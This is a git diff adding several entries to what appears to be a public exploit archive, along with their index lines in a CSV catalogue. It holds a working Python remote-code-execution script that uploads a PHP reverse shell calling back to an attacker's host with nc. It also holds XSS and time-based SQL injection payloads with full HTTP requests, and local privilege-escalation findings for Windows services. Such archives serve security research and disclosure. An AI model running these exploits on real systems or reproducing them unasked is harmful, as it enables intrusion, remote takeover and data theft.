+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: ';alert(document.cookie)//
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/php/webapps/49670.txt b/exploits/php/webapps/49670.txt
new file mode 100644
index 000000000..d695ed8af
--- /dev/null
+++ b/exploits/php/webapps/49670.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Boonex Dolphin 7.4.2 - 'width' Stored XSS
+# Date: 18-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.boonex.com/
+# Software Link: https://www.boonex.com/downloads
+# Version: 7.4.2
+# Tested on: Windows 10
+
+# Reference - https://github.com/xoffense/POC/blob/main/Boonex%20Dolphin%20CMS%207.4.2%20%20stored%20XSS
+
+Steps to Reproduce Bug:
+1- Login to Admin Panel
+2- Goto "Builders" => "Pages Builder"
+3- Select any page
+4- Turn on Burp Suite Intercept and Change "other pages width" to "1081px"
\ No newline at end of file
diff --git a/exploits/php/webapps/49672.py b/exploits/php/webapps/49672.py
new file mode 100755
index 000000000..365594c36
--- /dev/null
+++ b/exploits/php/webapps/49672.py
@@ -0,0 +1,64 @@
+# Exploit Title: Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)
+# Date: 19-03-2021
+# Exploit Author: Christian Vierschilling
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/11222/profiling-system-human-resource-management.html
+# Software Download: https://www.sourcecodester.com/download-code?nid=11222&title=Profiling+System+For+Human+Resource+Management+using+PHP%2FPDO+with+Source+Code
+# Version: 1.0
+# Tested on: PHP 7.4.14, Linux x64_x86
+
+# --- Description --- #
+
+# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
+
+# --- Proof of concept --- #
+
+#!/usr/bin/python3
+import random
+import sys
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+
+def file_upload(target_ip, attacker_ip, attacker_port):
+ random_number = str(random.randint(100000000,999999999))
+ file_name = random_number + "shell.php"
+ revshell_string = '&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
+ m = MultipartEncoder(fields={'upload': '', 'per_file': (file_name, revshell_string, 'application/x-php')})
+ print("(+) Uploading php reverse shell file ..")
+ r1 = requests.post('http://{}/ProfilingSystem/add_file_query.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
+ if not "Sorry, there was an error uploading your file." in r1.text:
+ print("(+) File uploaded to: http://{}/ProfilingSystem/uploads/{}".format(target_ip,file_name))
+ return file_name
+ else:
+ print("(-) Oh noes, error occured while uploading the file.. quitting!")
+ exit()
+
+def trigger_shell(target_ip, target_file_name):
+ url = 'http://{}/ProfilingSystem/uploads/{}'.format(target_ip, target_file_name)
+ print("(+) Now trying to trigger our shell..")
+ r2 = requests.get(url)
+ if r2.status_code != 200:
+ print("(-) Oh noes, we can't reach the uploaded file.. did it upload correctly?! Quitting!")
+ exit()
+ else:
+ return None
+
+def main():
+ if len(sys.argv) != 4:
+ print('(+) usage: %s ' % sys.argv[0])
+ print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
+ sys.exit(-1)
+
+ print("--- Exploiting today: Profiling System for Human Resource Management 1.0 ---")
+ print("----------------------------------------------------------------------------")
+ target_ip = sys.argv[1]
+ attacker_ip = sys.argv[2]
+ attacker_port = sys.argv[3]
+
+ target_file_name = file_upload(target_ip, attacker_ip, attacker_port)
+ trigger_shell(target_ip, target_file_name)
+
+ print("(+) done!")
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49687.txt b/exploits/php/webapps/49687.txt
new file mode 100644
index 000000000..a2c1ad4dc
--- /dev/null
+++ b/exploits/php/webapps/49687.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Online News Portal 1.0 - 'name' SQL Injection
+# Exploit Author: Richard Jones
+# Date: 2021-03-18
+# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+# Steps
+# Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php
+# Save request in BurpSuite
+# Run saved request with sqlmap -r sql.txt
+
+
+---
+Parameter: MULTIPART name ((custom) POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: -----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="name"
+
+aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY
+-----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="category"
+
+1
+-----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="price"
+
+asd
+-----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="qty"
+
+asd
+-----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="image"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------15280280330873390203691218429--
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49688.txt b/exploits/php/webapps/49688.txt
new file mode 100644
index 000000000..6bb76d5af
--- /dev/null
+++ b/exploits/php/webapps/49688.txt
@@ -0,0 +1,115 @@
+# Exploit Title: Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting
+# Exploit Author: Richard Jones
+# Date: 2021-03-18
+# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+# Multipul endpoints on the application suffer from Stored XSS injection as a user/supplier and admin. Scripts execute on page load.
+
+# One
+POST /pos_inv/admin/addcustomer.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------26863080316712198253766739741
+Content-Length: 661
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/pos_inv/admin/customer.php
+Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
+Upgrade-Insecure-Requests: 1
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="name"
+
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="address"
+
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="contact"
+
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="username"
+
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------26863080316712198253766739741--
+
+
+
+
+# Two
+http://127.0.0.1/pos_inv/admin/supplier.php
+
+POST /pos_inv/admin/edit_supplier.php?id=4 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 176
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/pos_inv/admin/supplier.php
+Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
+Upgrade-Insecure-Requests: 1
+
+name=Dell+Computer+Corporation&address=%3Cscript%3Ealert%28%60Stored+XSS%60%29%3C%2Fscript%3E&contact=1-800-WWW-DELL&username=supplier&password=fa3ddb86f38fb6a8284636249f6551aa
+
+
+
+
+# Three
+http://127.0.0.1/pos_inv/admin/product.php
+
+POST /pos_inv/admin/edit_product.php?id=12 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------11435260685310908573266876009
+Content-Length: 844
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/pos_inv/admin/product.php
+Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
+Upgrade-Insecure-Requests: 1
+
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="name"
+
+ACER Aspire GX-781 Gaming PC
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="category"
+
+2
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="supplier"
+
+0
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="price"
+
+749.99
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="qty"
+
+1000
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="image"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------11435260685310908573266876009--
\ No newline at end of file
diff --git a/exploits/windows/local/49671.txt b/exploits/windows/local/49671.txt
new file mode 100644
index 000000000..cdf015bec
--- /dev/null
+++ b/exploits/windows/local/49671.txt
@@ -0,0 +1,36 @@
+# Exploit Title: BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path
+# Date: 2021-03-17
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://global.brother/
+# Software Link: https://support.brother.com/g/b/downloadend.aspx?c=us&lang=en&prod=hls7000dn_us_eu_as&os=10013&dlid=dlf005042_000&flang=4&type3=26
+# Version: 3.75.0000
+# Tested on: Windows 10
+# Source: https://docs.unsafe-inline.com/0day/bradmin-professional-3.75-unquoted-service-path
+
+#Description:
+
+This software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices.
+If a user can insert a executable which is called as "BRAdmin" under the "C:\Program Files (x86)\Brother\" , local system privileges could be obtained by the user.
+
+#Detection of unquoted service path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """
+Brother BRAdminPro Scheduler
+BRA_Scheduler
+C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
+Auto
+
+
+C:\>sc qc BRA_Scheduler
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: BRA_Scheduler
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Brother BRAdminPro Scheduler
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49673.txt b/exploits/windows/local/49673.txt
new file mode 100644
index 000000000..c51d234d7
--- /dev/null
+++ b/exploits/windows/local/49673.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path
+# Discovery by: Riadh Bouchahoua
+# Discovery Date: 19-03-2021
+# Vendor Homepage: https://mosquitto.org/
+# Software Links : https://mosquitto.org/download/
+# Tested Version: 2.0.9
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 64 bits
+
+# Step to discover Unquoted Service Path:
+
+
+
+====
+
+C:\Users\Admin>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr "mosquitto"
+mosquitto C:\Program Files\mosquitto\mosquitto.exe run
+
+====
+
+C:\Users\Admin>sc qc mosquitto
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: mosquitto
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\mosquitto\mosquitto.exe run
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Mosquitto Broker
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49678.txt b/exploits/windows/local/49678.txt
new file mode 100644
index 000000000..a24ce64e8
--- /dev/null
+++ b/exploits/windows/local/49678.txt
@@ -0,0 +1,48 @@
+# Exploit Title: SOYAL 701 Server 9.0.1 - Insecure Permissions
+# Date: 25.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
+
+Vendor: SOYAL Technology Co., Ltd
+Product web page: https://www.soyal.com.tw | https://www.soyal.com
+Affected version: 9.0.1 190322
+ 8.0.6 181227
+
+Summary: 701 Server is the program used to set up and configure LAN
+and IP based access control systems, from the COM port used to the
+quantity and type of controllers connected. It is also used for
+programming some of the more complex controllers such as the AR-716E
+and the AR-829E.
+
+Desc: The application suffers from an elevation of privileges vulnerability
+which can be used by a simple authenticated user that can change the
+executable file with a binary of choice. The vulnerability exist due
+to the improper permissions, with the 'F' flag (Full) for 'Everyone'
+and 'Authenticated Users' group.
+
+Tested on: Microsoft Windows 10 Enterprise
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5633
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5633.php
+
+
+25.01.2021
+
+--
+
+
+C:\Program Files (x86)\701Server>cacls McuServer.exe
+C:\Program Files (x86)\701Server\McuServer.exe Everyone:F
+ NT AUTHORITY\Authenticated Users:(ID)F
+ NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+ BUILTIN\Users:(ID)R
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
+
+C:\Program Files (x86)\701Server>
\ No newline at end of file
diff --git a/exploits/windows/local/49679.txt b/exploits/windows/local/49679.txt
new file mode 100644
index 000000000..be7cd51f8
--- /dev/null
+++ b/exploits/windows/local/49679.txt
@@ -0,0 +1,48 @@
+# Exploit Title: SOYAL 701 Client 9.0.1 - Insecure Permissions
+# Date: 25.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
+
+Vendor: SOYAL Technology Co., Ltd
+Product web page: https://www.soyal.com.tw | https://www.soyal.com
+Affected version: 9.0.1 190410
+ 9.0.1 190115
+
+Summary: 701 Client is the user interface software for the access control
+system. It is used for adding and deleting tokens, setting door groups
+for access, setting time zones for limiting access and monitoring ingress
+and egress on a live system, among other things.
+
+Desc: The application suffers from an elevation of privileges vulnerability
+which can be used by a simple authenticated user that can change the
+executable file with a binary of choice. The vulnerability exist due
+to the improper permissions, with the 'F' flag (Full) for 'Authenticated Users'
+group.
+
+Tested on: Microsoft Windows 10 Enterprise
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5634
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5634.php
+
+
+25.01.2021
+
+--
+
+
+C:\Program Files (x86)\701Client>cacls client.exe
+C:\Program Files (x86)\701Client\client.exe NT AUTHORITY\Authenticated Users:F
+ NT AUTHORITY\Authenticated Users:(ID)F
+ NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+ BUILTIN\Users:(ID)R
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
+
+
+C:\Program Files (x86)\701Client>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ed5498318..06042909a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6774,6 +6774,7 @@ id,file,description,date,author,type,platform,port
49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
+49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11292,6 +11293,10 @@ id,file,description,date,author,type,platform,port
49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows,
49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",2021-03-18,"Mohammed Alshehri",local,windows,
+49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",2021-03-19,"Metin Yunus Kandemir",local,windows,
+49673,exploits/windows/local/49673.txt,"Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path",2021-03-19,"Riadh Bouchahoua",local,windows,
+49678,exploits/windows/local/49678.txt,"SOYAL 701 Server 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,
+49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18413,6 +18418,7 @@ id,file,description,date,author,type,platform,port
49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java,
49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows,
49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-14,F5,remote,windows,
+49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",2021-03-19,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43850,4 +43856,18 @@ id,file,description,date,author,type,platform,port
49662,exploits/multiple/webapps/49662.txt,"VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS",2021-03-18,"numan türle",webapps,multiple,
49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection",2021-03-18,"Piyush Patil",webapps,php,
49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php,
+49668,exploits/multiple/webapps/49668.txt,"Plone CMS 5.2.3 - 'Title' Stored XSS",2021-03-19,"Piyush Patil",webapps,multiple,
+49669,exploits/php/webapps/49669.txt,"LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS",2021-03-19,"Clément Cruchet",webapps,php,
+49670,exploits/php/webapps/49670.txt,"Boonex Dolphin 7.4.2 - 'width' Stored XSS",2021-03-19,"Piyush Patil",webapps,php,
+49672,exploits/php/webapps/49672.py,"Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)",2021-03-19,"Christian Vierschilling",webapps,php,
+49674,exploits/multiple/webapps/49674.txt,"VestaCP 0.9.8 - 'v_sftp_licence' Command Injection",2021-03-19,"numan türle",webapps,multiple,
+49676,exploits/hardware/webapps/49676.txt,"SOYAL Biometric Access Control System 5.0 - Master Code Disclosure",2021-03-19,LiquidWorm,webapps,hardware,
+49677,exploits/hardware/webapps/49677.html,"SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF",2021-03-19,LiquidWorm,webapps,hardware,
+49680,exploits/hardware/webapps/49680.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)",2021-03-19,LiquidWorm,webapps,hardware,
+49681,exploits/hardware/webapps/49681.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass",2021-03-19,LiquidWorm,webapps,hardware,
+49683,exploits/hardware/webapps/49683.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution",2021-03-19,LiquidWorm,webapps,hardware,
+49684,exploits/hardware/webapps/49684.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)",2021-03-19,LiquidWorm,webapps,hardware,
+49686,exploits/hardware/webapps/49686.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)",2021-03-19,LiquidWorm,webapps,hardware,
+49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",2021-03-19,"Richard Jones",webapps,php,
+49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",2021-03-19,"Richard Jones",webapps,php,
49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,